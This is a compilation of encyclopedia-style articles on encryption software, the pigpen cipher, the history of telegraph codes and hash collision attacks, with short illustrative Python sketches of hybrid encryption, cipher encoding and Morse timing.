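    # Receiver publishes a public key and keeps the private half.
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    public_key = private_key.public_key()

    # Sender: create a fresh symmetric key, encrypt the payload with it,
    # and wrap the symmetric key under the receiver's public key.
    sym_key = Fernet.generate_key()
    token = Fernet(sym_key).encrypt(b"data at rest, ready for transmission")
    wrapped_key = public_key.encrypt(sym_key, oaep)

    # Receiver: unwrap the symmetric key, then decrypt the payload.
    recovered = Fernet(private_key.decrypt(wrapped_key, oaep)).decrypt(token)
    assert recovered == b"data at rest, ready for transmission"

Only the small symmetric key passes through the expensive asymmetric operation; the bulk data is handled by the faster symmetric cipher, which is the efficiency argument made earlier in the article.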
https://en.wikipedia.org/wiki/Encryption_software
Some famous ciphertexts (or cryptograms), in chronological order by date, are:
https://en.wikipedia.org/wiki/List_of_ciphertexts
The pigpen cipher (alternatively referred to as the masonic cipher, Freemason's cipher, Rosicrucian cipher, Napoleon cipher, and tic-tac-toe cipher)[2][3] is a geometric simple substitution cipher, which exchanges letters for symbols which are fragments of a grid. The example key shows one way the letters can be assigned to the grid. The pigpen cipher offers little cryptographic security. It differentiates itself from other simple monoalphabetic substitution ciphers solely by its use of symbols rather than letters, a feature which does nothing to hinder cryptanalysis. Additionally, the prominence and recognizability of the pigpen cipher make it arguably worthless from a security standpoint. Knowledge of pigpen is so ubiquitous that an interceptor might not need to actually break this cipher at all, but merely decipher it, in the same way that the intended recipient would. Due to pigpen's simplicity, it is very often included in children's books on ciphers and secret writing.[4] The cipher is believed to be an ancient cipher[5][6] and is said to have originated with the Hebrew rabbis.[7][8] Thompson writes that "there is evidence that suggests that the Knights Templar utilized a pig-pen cipher" during the Christian Crusades.[9][10] Parrangan & Parrangan write that it was used by an individual, who may have been a Mason, "in the 16th century to save his personal notes."[11] In 1531 Cornelius Agrippa described an early form of the Rosicrucian cipher, which he attributes to an existing Jewish Kabbalistic tradition.[12] This system, called "The Kabbalah of the Nine Chambers" by later authors, used the Hebrew alphabet rather than the Latin alphabet, and was used for religious symbolism rather than for any apparent cryptological purpose.[13] On 7 July 1730, a French pirate named Olivier Levasseur threw out a scrap of paper written in the pigpen cipher, allegedly containing the whereabouts of his treasure; the treasure was never found but is speculated to be located in the Seychelles. The exact configuration of his cipher has also never been determined; it appears to be an example of using different letters in different sections to complicate the cipher beyond its standard configuration. Variations of this cipher were used by both the Rosicrucian brotherhood[14] and the Freemasons, though the latter used the pigpen cipher so often that the system is frequently called the Freemason's cipher. Hysin claims it was invented by Freemasons.[15] They began using it in the early 18th century to keep their records of history and rites private, and for correspondence between lodge leaders.[3][16][17] Tombstones of Freemasons can also be found which use the system as part of the engravings. One of the earliest stones in Trinity Church Cemetery in New York City, which opened in 1697, contains a cipher of this type which deciphers to "Remember death" (cf. "memento mori"). George Washington's army had documentation about the system, with a much more randomized form of the alphabet. During the American Civil War, the system was used by Union prisoners in Confederate prisons.[14] Using the pigpen cipher key shown in the example below, the message "X marks the spot" is rendered in ciphertext as a string of grid-fragment symbols. The core elements of this system are the grid and dots. Some systems use the X's, but even these can be rearranged. One commonly used method orders the symbols as shown in the above image: grid, grid, X, X. Another commonly used system orders the symbols as grid, X, grid, X.
Another is grid, grid, grid, with each cell having a letter of the alphabet, and the last one having an "&" character. Letters from the first grid have no dot, letters from the second each have one dot, and letters from the third each have two dots. Another variation of this last one is called the Newark Cipher, which instead of dots uses one to three short lines which may be projecting in any length or orientation. This gives the illusion of a larger number of different characters than actually exist.[18] Another system, used by the Rosicrucians in the 17th century, used a single grid of nine cells, and 1 to 3 dots in each cell or "pen". So ABC would be in the top left pen, followed by DEF and GHI on the first line, then groups of JKL MNO PQR on the second, and STU VWX YZ on the third.[2][14] When enciphered, the location of the dot in each symbol (left, center, or right) would indicate which letter in that pen was represented.[1][14] More difficult systems use a non-standard form of the alphabet, such as writing it backwards in the grid, up and down in the columns,[4] or a completely randomized set of letters. The Templar cipher is a method claimed to have been used by the Knights Templar and uses a variant of a Maltese Cross.[19] This is likely a cipher used by the Neo-Templars (Freemasons) of the 18th century, and not that of the religious order of the Knights Templar from the 12th–14th centuries during the Crusades.[20] Some websites showing the Knights Templar cipher deviate from the original order of letters. Based on the Freemasons Document,[21] the 1st, 3rd, 4th and 5th crosses assign the letters in clockwise order starting at the top, the 2nd cross assigns the letters in a left, right, top, bottom order, while the final cross assigns the letters in a bottom, top, right, left order. The Club Penguin Code,[22] also known as the Tic-Tac-Toe code,[22] the PSA cipher, and the EPF cipher, is a cipher created by online composer and artist Chris Hendricks (known online as Screenhog) for the online game Club Penguin. Designed for use by the in-universe group Elite Penguin Force (EPF, formerly known as the Penguin Secret Agency, or PSA), the cipher leans more heavily into the style of tic-tac-toe. It is represented with three grids, which each represent nine letters of the alphabet arranged left to right, top to bottom: one blank, for letters A–I; one with the letter X in each space, for letters J–R; and one with the letter O in each space, for letters S–Z, plus an additional character. This last character is used as a signature for the in-universe leader of the EPF, known as the Director. The need for a unique code came from Hendricks wishing to distance Club Penguin related materials from anything regarding Freemason or New World Order conspiracy theories. He said in a video uploaded to his YouTube channel:[23] I just didn't want Club Penguin being associated in videos like "So, Club Penguin, right? 'Fun and safe virtual world for kids?' I guess they forgot to put mind control in their advertisements! I have hard-hitting exclusive proof that Club Penguin is using the exact same code that the Illuminati use!" [...] Now, I grant you, the odds of a video like that actually gaining any traction is pretty slim, but would you take that chance? I didn't. I instead looked at the code and said "This looks a lot like Tic-Tac-Toe! What if we just copied it three times, kept the first one blank, the second one with X's, and the third one with O's? That's twenty-seven spaces.
It'll cover the whole alphabet and give us something unique that's not conspiracy theory friendly." So that's what we did, and that was that.
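The Rosicrucian single-grid variant described above reduces to a simple mapping from each letter to a pen and a dot position, which the following Python sketch illustrates. The textual output format is an assumption, since the real cipher is drawn rather than written.

    # Nine "pens" of the single 3x3 grid, read left to right, top to bottom.
    PENS = ["ABC", "DEF", "GHI", "JKL", "MNO", "PQR", "STU", "VWX", "YZ"]
    DOTS = ["left", "centre", "right"]   # dot position selects the letter in a pen

    def encode(letter):
        for pen, letters in enumerate(PENS):
            if letter in letters:
                return pen, DOTS[letters.index(letter)]
        raise ValueError(f"not a cipher letter: {letter}")

    print(encode("X"))   # (7, 'right') – pen 7 holds VWX; the right dot marks X

The two-grid and three-grid variants described earlier work the same way, except that the grid index (no dot, one dot, two dots) replaces the dot position as the disambiguating mark.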
https://en.wikipedia.org/wiki/Pigpen_Cipher
A telegraph code is one of the character encodings used to transmit information by telegraphy. Morse code is the best-known such code. Telegraphy usually refers to the electrical telegraph, but telegraph systems using the optical telegraph were in use before that. A code consists of a number of code points, each corresponding to a letter of the alphabet, a numeral, or some other character. In codes intended for machines rather than humans, code points for control characters, such as carriage return, are required to control the operation of the mechanism. Each code point is made up of a number of elements arranged in a unique way for that character. There are usually two types of element (a binary code), but more element types were employed in some codes not intended for machines. For instance, American Morse code had about five elements, rather than the two (dot and dash) of International Morse Code. Codes meant for human interpretation were designed so that the characters that occurred most often had the fewest elements in the corresponding code point. For instance, Morse code for E, the most common letter in English, is a single dot (▄), whereas Q is ▄▄▄ ▄▄▄ ▄ ▄▄▄. These arrangements meant the message could be sent more quickly and it would take longer for the operator to become fatigued. Telegraphs were always operated by humans until late in the 19th century. When automated telegraph messages came in, codes with variable-length code points were inconvenient for machine design of the period. Instead, codes with a fixed length were used. The first of these was the Baudot code, a five-bit code. Baudot has only enough code points to print in upper case. Later codes had more bits (ASCII has seven) so that both upper and lower case could be printed. Beyond the telegraph age, modern computers require a very large number of code points (Unicode has 21 bits) so that multiple languages and alphabets (character sets) can be handled without having to change the character encoding. Modern computers can easily handle variable-length codes such as UTF-8 and UTF-16, which have now become ubiquitous. Prior to the electrical telegraph, a widely used method of building national telegraph networks was the optical telegraph, consisting of a chain of towers from which signals could be sent by semaphore or shutters from tower to tower. This was particularly highly developed in France and had its beginnings during the French Revolution. The code used in France was the Chappe code, named after Claude Chappe the inventor. The British Admiralty also used the semaphore telegraph, but with their own code. The British code was necessarily different from that used in France because the British optical telegraph worked in a different way. The Chappe system had moveable arms, as if it were waving flags as in flag semaphore. The British system used an array of shutters that could be opened or closed.[1] The Chappe system consisted of a large pivoted beam (the regulator) with an arm at each end (the indicators) which pivoted around the regulator at one extremity. The angles these components were allowed to take were limited to multiples of 45° to aid readability. This gave a code space of 8×4×8 code points, but the indicator position in line with the regulator was never used because it was hard to distinguish from the indicator being folded back on top of the regulator, leaving a code space of 7×4×7 = 196.
Symbols were always formed with the regulator on either the left- or right-leaning diagonal (oblique) and only accepted as valid when the regulator moved to either the vertical or horizontal position. The left oblique was always used for messages, with the right oblique being used for control of the system. This further reduced the code space to 98, of which either four or six code points (depending on version) were control characters, leaving a code space for text of 94 or 92 respectively. The Chappe system mostly transmitted messages using a code book with a large number of set words and phrases. It was first used on an experimental chain of towers in 1793 and put into service from Paris to Lille in 1794. The code book used in this early period is not known for certain, but an unidentified code book in the Paris Postal Museum may have been for the Chappe system. The arrangement of this code in columns of 88 entries led Holzmann & Pehrson to suggest that 88 code points might have been used. However, the proposal in 1793 was for ten code points representing the numerals 0–9, and Bouchet says this system was still in use as late as 1800 (Holzmann & Pehrson put the change at 1795). The code book was revised and simplified in 1795 to speed up transmission. The code was in two divisions: the first division was 94 alphabetic and numeric characters plus some commonly used letter combinations; the second division was a code book of 94 pages with 94 entries on each page. A code point was assigned for each number up to 94. Thus, only two symbols needed to be sent to transmit an entire sentence – the page and line numbers of the code book – compared to four symbols using the ten-symbol code. In 1799, three additional divisions were added. These had additional words and phrases, geographical places, and names of people. These three divisions required extra symbols to be added in front of the code symbol to identify the correct book. The code was revised again in 1809 and remained stable thereafter. In 1837 a horizontal-only coding system was introduced by Gabriel Flocon, which did not require the heavy regulator to be moved. Instead, an additional indicator was provided in the centre of the regulator to transmit that element of the code.[2] The Edelcrantz system was used in Sweden and was the second largest network built after that of France. The telegraph consisted of a set of ten shutters. Nine of these were arranged in a 3×3 matrix. Each column of shutters represented a binary-coded octal digit, with a closed shutter representing "1" and the most significant digit at the bottom. Each symbol of telegraph transmission was thus a three-digit octal number. The tenth shutter was an extra-large one at the top. Its meaning was that the codepoint should be preceded by "A". One use of the "A" shutter was that a numeral codepoint preceded by "A" meant add a zero (multiply by ten) to the digit. Larger numbers could be indicated by following the numeral with the code for hundreds (236), thousands (631) or a combination of these. This required fewer symbols to be transmitted than sending all the zero digits individually. However, the main purpose of the "A" codepoints was for a codebook of predetermined messages, much like the Chappe codebook. The symbols without "A" were a large set of numerals, letters, common syllables and words to aid code compaction. Around 1809, Edelcrantz introduced a new codebook with 5,120 codepoints, each requiring a two-symbol transmission to identify.
There were many codepoints for error correction (272, error), flow control, and supervisory messages. Usually, messages were expected to be passed all the way down the line, but there were circumstances when individual stations needed to communicate directly, usually for managerial purposes. The most common, and simplest, situation was communication between adjacent stations. Codepoints 722 and 227 were used for this purpose, to get the attention of the next station towards, or away from, the sun, respectively. For more remote stations codepoints 557 and 755 respectively were used, followed by the identification of the requesting and target stations.[3] Flag signalling was widely used for point-to-point signalling prior to the optical telegraph, but it was difficult to construct a nationwide network with hand-held flags. The much larger mechanical apparatus of the semaphore telegraph towers was needed so that a greater distance between links could be achieved. However, an extensive network with hand-held flags was constructed during the American Civil War. This was the wig-wag system, which used the code invented by Albert J. Myer. Some of the towers used were enormous, up to 130 feet, to get a good range. Myer's code required only one flag, using a ternary code. That is, each code element consisted of one of three distinct flag positions. However, the alphabetical codepoints required only two positions; the third position was only used in control characters. Using a ternary code in the alphabet would have resulted in shorter messages because fewer elements are required in each codepoint, but a binary system is easier to read at long distance since fewer flag positions need to be distinguished. Myer's manual also describes a ternary-coded alphabet with a fixed length of three elements for each codepoint.[4] Many different codes were invented during the early development of the electrical telegraph. Virtually every inventor produced a different code to suit their particular apparatus. The earliest code used commercially on an electrical telegraph was the Cooke and Wheatstone telegraph five-needle code (C&W5). This was first used on the Great Western Railway in 1838. C&W5 had the major advantage that the code did not need to be learned by the operator; the letters could be read directly off the display board. However, it had the disadvantage that it required too many wires. A one-needle code, C&W1, was developed that required only one wire. C&W1 was widely used in the UK and the British Empire. Some other countries used C&W1, but it never became an international standard and generally each country developed its own code. In the US, American Morse code was used, whose elements consisted of dots and dashes distinguished from each other by the length of the pulse of current on the telegraph line. This code was used on the telegraph invented by Samuel Morse and Alfred Vail and was first used commercially in 1844. Morse initially had code points only for numerals. He planned that numbers sent over the telegraph would be used as an index to a dictionary with a limited set of words. Vail invented an extended code that included code points for all the letters so that any desired word could be sent. It was Vail's code that became American Morse. In France, the telegraph used the Foy-Breguet telegraph, a two-needle telegraph that displayed the needles in Chappe code, the same code as the French optical telegraph, which was still more widely used than the electrical telegraph in France.
To the French, this had the great advantage that they did not need to retrain their operators in a new code.[5] In Germany in 1848, Friedrich Clemens Gerke developed a heavily modified version of American Morse for use on German railways. American Morse had three different lengths of dashes and two different lengths of space between the dots and dashes in a code point. The Gerke code had only one length of dash, and all inter-element spaces within a code point were equal. Gerke also created code points for the German umlaut letters, which do not exist in English. Many central European countries belonged to the German-Austrian Telegraph Union. In 1851, the Union decided to adopt a common code across all its countries so that messages could be sent between them without the need for operators to recode them at borders. The Gerke code was adopted for this purpose. In 1865, a conference in Paris adopted the Gerke code as the international standard, calling it International Morse Code. With some very minor changes, this is the Morse code used today. The Cooke and Wheatstone telegraph needle instruments were capable of using Morse code, since dots and dashes could be sent as left and right movements of the needle. By this time, the needle instruments were being made with end stops that made two distinctly different notes as the needle hit them. This enabled the operator to write the message without looking up at the needle, which was much more efficient. This was a similar advantage to the Morse telegraph, in which the operators could hear the message from the clicking of the relay armature. Nevertheless, after the British telegraph companies were nationalised in 1870, the General Post Office decided to standardise on the Morse telegraph and get rid of the many different systems they had inherited from private companies. In the US, telegraph companies refused to use International Morse because of the cost of retraining operators. They opposed attempts by the government to make it law. In most other countries, the telegraph was state controlled, so the change could simply be mandated. In the US, there was no single entity running the telegraph. Rather, it was a multiplicity of private companies. This resulted in international operators needing to be fluent in both versions of Morse and to recode both incoming and outgoing messages. The US continued to use American Morse on landlines (radiotelegraphy generally used International Morse), and this remained the case until the advent of teleprinters, which required entirely different codes and rendered the issue moot.[6] The speed of sending in a manual telegraph is limited by the speed at which the operator can send each code element. Speeds are typically stated in words per minute. Words are not all the same length, so literally counting the words will give a different result depending on message content. Instead, a word is defined as five characters for the purpose of measuring speed, regardless of how many words are actually in the message. Morse code, and many other codes, also do not have the same length of code for each character of the word, again introducing a content-related variable. To overcome this, the speed of an operator repeatedly transmitting a standard word is used. PARIS is classically chosen as this standard because that is the length of an average word in Morse.[7] In American Morse, the characters are generally shorter than in International Morse.
This is partly because American Morse uses more dot elements, and partly because the most common dash, the short dash, is shorter than the International Morse dash (two dot elements long against three). In principle, American Morse will be transmitted faster than International Morse if all other variables are equal. In practice, there are two things that detract from this. Firstly, American Morse, with around five distinct coding elements, made it harder to get the timings right when sending quickly. Inexperienced operators were apt to send garbled messages, an effect known as hog Morse. The second reason is that American Morse is more prone to intersymbol interference (ISI) because of the greater density of closely spaced dots. This problem was particularly severe on submarine telegraph cables, making American Morse less suitable for international communications. The only solution an operator had immediately to hand to deal with ISI was to slow down the transmission speed.[8] Morse code for non-Latin alphabets, such as Cyrillic or Arabic script, is achieved by constructing a character encoding for the alphabet in question using the same, or nearly the same, code points as used in the Latin alphabet. Syllabaries, such as Japanese katakana, are also handled this way (Wabun code). The alternative of adding more code points to Morse code for each new character would result in code transmissions being very long in some languages.[9] Languages that use logograms are more difficult to handle due to the much larger number of characters required. The Chinese telegraph code uses a codebook of around 9,800 characters (7,000 when originally launched in 1871), each assigned a four-digit number. It is these numbers that are transmitted, so Chinese Morse code consists entirely of numerals. The numbers must be looked up at the receiving end, making this a slow process, but in the era when the telegraph was widely used, skilled Chinese telegraphers could recall many thousands of the common codes from memory. The Chinese telegraph code is still used by law enforcement because it is an unambiguous method of recording Chinese names in non-Chinese scripts.[10] Early printing telegraphs continued to use Morse code, but the operator no longer sent the dots and dashes directly with a single key. Instead they operated a piano keyboard with the characters to be sent marked on each key. The machine generated the appropriate Morse code point from the key press. An entirely new type of code was developed by Émile Baudot, patented in 1874. The Baudot code was a 5-bit binary code, with the bits sent serially. Having a fixed-length code greatly simplified the machine design. The operator entered the code from a small 5-key piano keyboard, each key corresponding to one bit of the code. Like Morse, Baudot code was organised to minimise operator fatigue, with the code points requiring the fewest key presses assigned to the most common letters. Early printing telegraphs required mechanical synchronisation between the sending and receiving machines. The Hughes printing telegraph of 1855 achieved this by sending a Morse dash every revolution of the machine. A different solution was adopted in conjunction with the Baudot code. Start and stop bits were added to each character on transmission, which allowed asynchronous serial communication. This scheme of start and stop bits was followed on all the later major telegraph codes.[11] On busy telegraph lines, a variant of the Baudot code was used with punched paper tape.
This was the Murray code, invented by Donald Murray in 1901. Instead of directly transmitting to the line, the keypresses of the operator punched holes in the tape. Each row of holes across the tape had five possible positions to punch, corresponding to the five bits of the Murray code. The tape was then run through a tape reader which generated the code and sent it down the telegraph line. The advantage of this system was that multiple messages could be sent to the line very quickly from one tape, making better use of the line than direct manual operation could. Murray completely rearranged the character encoding to minimise wear on the machine, since operator fatigue was no longer an issue. Thus, the character sets of the original Baudot and the Murray codes are not compatible. The five bits of the Baudot code are insufficient to represent all the letters, numerals, and punctuation required in a text message. Further, additional characters are required by printing telegraphs to better control the machine. Examples of these control characters are line feed and carriage return. Murray solved this problem by introducing shift codes. These codes instruct the receiving machine to change the character encoding to a different character set. Two shift codes were used in the Murray code: figure shift and letter shift. Another control character introduced by Murray was the delete character (DEL, code 11111), which punched out all five holes on the tape. Its intended purpose was to remove erroneous characters from the tape, but Murray also used multiple DELs to mark the boundary between messages. Having all the holes punched out made a perforation which was easy to tear into separate messages at the receiving end. A variant of the Baudot–Murray code became an international standard as International Telegraph Alphabet no. 2 (ITA 2) in 1924. The "2" in ITA 2 is because the original Baudot code became the basis for ITA 1. ITA 2 remained the standard telegraph code in use until the 1960s and was still in use in places well beyond then.[12] The teleprinter was invented in 1915. This is a printing telegraph with a typewriter-like keyboard on which the operator types the message. Nevertheless, telegrams continued to be sent in upper case only because there was not room for a lower case character set in the Baudot–Murray or ITA 2 codes. Teleprinters were quickly adopted by news organizations, and "wire services" supplying stories to multiple newspapers developed, but an additional application soon arose: sending finished copy from an urban newsroom to a remote printing plant. The limited character repertoire of the 5-level codes meant that someone had to manually retype the telegram in mixed case, a laborious and error-prone operation. The Monotype system already had separate keyboards and casters communicating by a paper tape, but it used a very wide 28-position paper tape to select one of 15 rows and 15 columns in the matrix case. To compete, the Mergenthaler Linotype Company developed a TeleTypeSetter (TTS) system which functioned similarly, but using a narrower 6-level code (the name "bit" would not be coined until 1948) which was more economical to transmit. TTS retained shift and unshift control characters, but they operated much like a modern keyboard: the unshift state provided lower-case letters, digits, and common punctuation, while the shift state provided upper-case letters and special symbols. TTS also included Linotype-specific features such as ligatures and a second "upper rail" shift function usually used for italic type.
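The shift codes and the start/stop framing described above lend themselves to a short sketch. The following fragment is illustrative only: the five-bit patterns and the two-character tables are invented for the example (they are not the real Baudot, Murray, or ITA 2 assignments), but the mechanism, a shift codepoint that switches the active character set, with a start and a stop bit around each character, is the one described in the text.

```python
# Minimal sketch of a 5-bit shifted code with start/stop framing.
# The code tables and shift codepoints below are invented for
# illustration; they are NOT the real Baudot, Murray or ITA 2 values.
LTRS, FIGS = 0b11101, 0b11011            # hypothetical shift codepoints
LETTERS = {0b00011: 'A', 0b11001: 'B'}   # hypothetical letter table
FIGURES = {0b00011: '1', 0b11001: '2'}   # hypothetical figure table

def frame(code):
    """Wrap a 5-bit code in a start bit (0) and a stop bit (1)."""
    return [0] + [int(b) for b in format(code, '05b')] + [1]

def decode(frames):
    """Decode framed 5-bit characters, honouring the shift state."""
    table, out = LETTERS, []             # receiver assumes letter shift
    for f in frames:
        assert f[0] == 0 and f[-1] == 1, "framing error"
        code = int(''.join(map(str, f[1:6])), 2)
        if code == LTRS:
            table = LETTERS              # switch to the letter character set
        elif code == FIGS:
            table = FIGURES              # switch to the figure character set
        else:
            out.append(table.get(code, '?'))
    return ''.join(out)

msg = [frame(0b00011), frame(FIGS), frame(0b00011), frame(LTRS), frame(0b11001)]
print(decode(msg))                       # -> 'A1B'
```

Note how the same five-bit pattern (0b00011 here) decodes to different characters depending on the shift state, which is exactly why a lost shift character garbled everything that followed it.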
A typewriter-like "perforator" would create a paper tape, and had a large dial showing the length of the line so far at the minimum and maximumspacebandwidth so the typist could decide where to break lines. This tape was then transmitted to "reperforator", and the recreated paper tape was fed into aLinotype machinewith a tape reader at the printing plant. (The tape reader could be retrofitted to an existing Linotype machine, but also special high-speed Linotype machines were made which could operate faster than a manual operator could type.) An operator was still required to handle the tapes, take the finished type to layout, addtype metalas needed, clear jams, and so on, but one operator could manage multiple Linotype machines. To keep the feed perforations in the middle of the tape, the TTS code added a "0" row beside the "1" row in ITA-2. To show the similarity to the ITS-2 code, the following tables are sorted as if this is the most-significant bit. Each shift state has 41 unique characters, making 82 in total. Adding the 8 fixed-width characters which are duplicated in the two shift states, this matches the 90-matrix capacity of a standard Linotype machine. (The variable-width space bands are a 91st character.) The first computers used existing 5-bit ITA-2 keyboards and printers due to their easy availability, but the limited character repertoire quickly became a pain point. By the 1960s, improving teleprinter technology meant that longer codes were nowhere near as significant a factor in teleprinter costs as they once were. The computer users wanted lowercase characters and additional punctuation, while both teleprinter and computer manufacturers wished to get rid of shift codes. This led theAmerican Standards Associationto develop a 7-bit code, the American Standard Code for Information Interchange (ASCII). The final form of ASCII was published in 1964 and it rapidly became the standard teleprinter code. ASCII was the last major code developed explicitly with telegraphy equipment in mind. Telegraphy rapidly declined after this and was largely replaced bycomputer networks, especially theInternetin the 1990s. ASCII had several features geared to aid computer programming. The letter characters were in numerical order of code point, so an alphabetical sort could be achieved simply by sorting the data numerically. The code point for corresponding upper and lower case letters differed only by the value of bit 6, allowing a mix of cases to be sorted alphabetically if this bit was ignored. Other codes were introduced, notablyIBM'sEBCDICderived from thepunched cardmethod of input, but it was ASCII and its derivatives that won out as thelingua francaof computer information exchange.[18] The arrival of themicroprocessorin the 1970s and thepersonal computerin the 1980s with their8-bit architectureled to the 8-bitbytebecoming the standard unit of computer storage. Packing 7-bit data into 8-bit storage is inconvenient for data retrieval. Instead, most computers stored one ASCII character per byte. This left one bit over that was not doing anything useful. Computer manufacturers used this bit inextended ASCIIto overcome some of the limitations of standard ASCII. The main issue was that ASCII was geared to English, particularly American English, and lacked theaccentedvowels used in other European languages such as French. Currency symbols for other countries were also added to the character set. 
Unfortunately, different manufacturers implemented different extended ASCIIs, making them incompatible across platforms. In 1987, the International Organization for Standardization issued the standard ISO 8859-1, an 8-bit character encoding based on 7-bit ASCII, which was widely taken up. ISO 8859 character encodings were developed for non-Latin scripts such as Cyrillic, Hebrew, Arabic, and Greek. This was still problematic if a document or data used more than one script: multiple switches between character encodings were required. This was solved by the publication in 1991 of the standard for 16-bit Unicode, in development since 1987. Unicode maintained ASCII characters at the same code points for compatibility. As well as support for non-Latin scripts, Unicode provided code points for logograms such as Chinese characters and many specialist characters such as astrological and mathematical symbols. In 1996, Unicode 2.0 allowed code points greater than 16 bits: up to 20 bits, and 21 bits with an additional private use area. 20-bit Unicode provided support for extinct languages such as Old Italic script and many rarely used Chinese characters.[19] In 1931, the International Code of Signals, originally created for ship communication by signalling using flags, was expanded by adding a collection of five-letter codes to be used by radiotelegraph operators. An alternative representation of needle codes is to use the numeral "1" for needle left, and "3" for needle right. The numeral "2", which does not appear in most codes, represents the needle in the neutral upright position. The codepoints using this scheme are marked on the face of some needle instruments, especially those used for training.[32] When used with a printing telegraph or siphon recorder, the "dashes" of dot-dash codes are often made the same length as the "dot". Typically, the mark on the tape for a dot is made above the mark for a dash. An example of this can be seen in the 1837 Steinheil code, which is nearly identical to the 1849 Steinheil code, except that they are represented differently in the table. International Morse code was commonly used in this form on submarine telegraph cables.[40]
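The words-per-minute arithmetic described earlier can be made concrete. In International Morse timing, a dot is one unit, a dash three, the gap inside a character one, the gap between characters three, and the gap between words seven; the sketch below uses the standard International Morse codepoints for the letters of PARIS:

```python
# Duration of a word in dot units under International Morse timing:
# dot = 1, dash = 3, gap within a character = 1,
# gap between characters = 3, gap between words = 7.
MORSE = {'P': '.--.', 'A': '.-', 'R': '.-.', 'I': '..', 'S': '...'}

def word_units(word):
    units = 0
    for i, letter in enumerate(word):
        code = MORSE[letter]
        units += sum(1 if e == '.' else 3 for e in code)  # dots and dashes
        units += len(code) - 1                            # intra-character gaps
        if i < len(word) - 1:
            units += 3                                    # inter-character gap
    return units + 7                                      # trailing word gap

print(word_units("PARIS"))   # 50 units -- the classic standard word
# At w words per minute, one dot therefore lasts 60 / (50 * w) seconds:
w = 20
print(f"dot length at {w} wpm: {60 / (50 * w) * 1000:.0f} ms")  # 60 ms
```

This is why PARIS makes a convenient standard: at exactly 50 units, stated speeds convert directly into element timings.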
https://en.wikipedia.org/wiki/Telegraph_code
In cryptography, a collision attack on a cryptographic hash tries to find two inputs producing the same hash value, i.e. a hash collision. This is in contrast to a preimage attack, where a specific target hash value is specified. There are roughly two types of collision attacks: the classical collision attack, which finds any two different messages that produce the same hash value, and, more generally, the chosen-prefix collision attack, which finds such messages with attacker-chosen prefixes. Much like symmetric-key ciphers are vulnerable to brute force attacks, every cryptographic hash function is inherently vulnerable to collisions using a birthday attack. Due to the birthday problem, these attacks are much faster than a brute force would be. A hash of n bits can be broken in 2^(n/2) time steps (evaluations of the hash function). Mathematically stated, a collision attack finds two different messages m1 and m2 such that hash(m1) = hash(m2). In a classical collision attack, the attacker has no control over the content of either message, but they are arbitrarily chosen by the algorithm. More efficient attacks are possible by employing cryptanalysis against specific hash functions. When a collision attack is discovered and is found to be faster than a birthday attack, a hash function is often denounced as "broken". The NIST hash function competition was largely induced by published collision attacks against two very commonly used hash functions, MD5[1] and SHA-1. The collision attacks against MD5 have improved so much that, as of 2007, finding one takes just a few seconds on a regular computer.[2] Hash collisions created this way are usually constant length and largely unstructured, so they cannot directly be applied to attack widespread document formats or protocols. However, workarounds are possible by abusing dynamic constructs present in many formats. In this way, two documents would be created which are as similar as possible in order to have the same hash value. One document would be shown to an authority to be signed, and then the signature could be copied to the other file. Such a malicious document would contain two different messages in the same document, but conditionally display one or the other through subtle changes to the file. An extension of the collision attack is the chosen-prefix collision attack, which is specific to Merkle–Damgård hash functions. In this case, the attacker can choose two arbitrarily different documents, and then append different calculated values that result in the whole documents having an equal hash value. This attack is normally harder (a hash of n bits can be broken in 2^((n/2)+1) time steps), but is much more powerful than a classical collision attack. Mathematically stated, given two different prefixes p1 and p2, the attack finds two suffixes s1 and s2 such that hash(p1 ∥ s1) = hash(p2 ∥ s2) (where ∥ is the concatenation operation). More efficient attacks are also possible by employing cryptanalysis against specific hash functions. In 2007, a chosen-prefix collision attack was found against MD5, requiring roughly 2^50 evaluations of the MD5 function. The paper also demonstrates two X.509 certificates for different domain names with colliding hash values. This means that a certificate authority could be asked to sign a certificate for one domain, and then that certificate (specifically, its signature) could be used to create a new rogue certificate to impersonate another domain.[5] A real-world collision attack was published in December 2008 when a group of security researchers published a forged X.509 signing certificate that could be used to impersonate a certificate authority, taking advantage of a prefix collision attack against the MD5 hash function.
This meant that an attacker could impersonate any SSL-secured website as a man-in-the-middle, thereby subverting the certificate validation built into every web browser to protect electronic commerce. The rogue certificate may not be revocable by real authorities, and could also have an arbitrary forged expiry time. Even though MD5 was known to be very weak in 2004,[1] certificate authorities were still willing to sign MD5-verified certificates in December 2008,[6] and at least one Microsoft code-signing certificate was still using MD5 in May 2012. The Flame malware successfully used a new variation of a chosen-prefix collision attack to spoof code signing of its components by a Microsoft root certificate that still used the compromised MD5 algorithm.[7][8] In 2019, researchers found a chosen-prefix collision attack against SHA-1 with computing complexity between 2^66.9 and 2^69.4 and a cost of less than 100,000 US dollars.[9][10] In 2020, researchers reduced the complexity of a chosen-prefix collision attack against SHA-1 to 2^63.4.[11] Many applications of cryptographic hash functions do not rely on collision resistance, so collision attacks do not affect their security. For example, HMACs are not vulnerable.[12] For the attack to be useful, the attacker must be in control of the input to the hash function. Because digital signature algorithms cannot sign a large amount of data efficiently, most implementations use a hash function to reduce ("compress") the amount of data that needs to be signed down to a constant size. Digital signature schemes often become vulnerable to hash collisions as soon as the underlying hash function is practically broken; techniques like randomized (salted) hashing will buy extra time by requiring the harder preimage attack.[13] The usual attack scenario resembles the document-substitution example above: the attacker obtains a signature on one of two colliding inputs and transfers it to the other. In 2008, researchers used a chosen-prefix collision attack against MD5 in this way to produce a rogue certificate authority certificate. They created two versions of a TLS public key certificate, one of which appeared legitimate and was submitted for signing by the RapidSSL certificate authority. The second version, which had the same MD5 hash, contained flags which signal web browsers to accept it as a legitimate authority for issuing arbitrary other certificates.[14] Hash flooding (also known as HashDoS[15]) is a denial of service attack that uses hash collisions to exploit the worst-case (linear probe) runtime of hash table lookups.[16] It was originally described in 2003 as an example of an algorithmic complexity attack.[17] To execute such an attack, the attacker sends the server multiple pieces of data that hash to the same value and then tries to get the server to perform slow lookups. As the main focus of hash functions used in hash tables was speed instead of security, most major programming languages were affected,[17] with new vulnerabilities of this class still showing up a decade after the original presentation.[16] To prevent hash flooding without making the hash function overly complex, newer keyed hash functions have been introduced, with the security objective that collisions are hard to find as long as the key is unknown. They may be slower than previous hashes, but are still much easier to compute than cryptographic hashes. As of 2021, Jean-Philippe Aumasson and Daniel J. Bernstein's SipHash (2012) is the most widely used hash function in this class.[18] (Non-keyed "simple" hashes remain safe to use as long as the application's hash table is not controllable from the outside.)
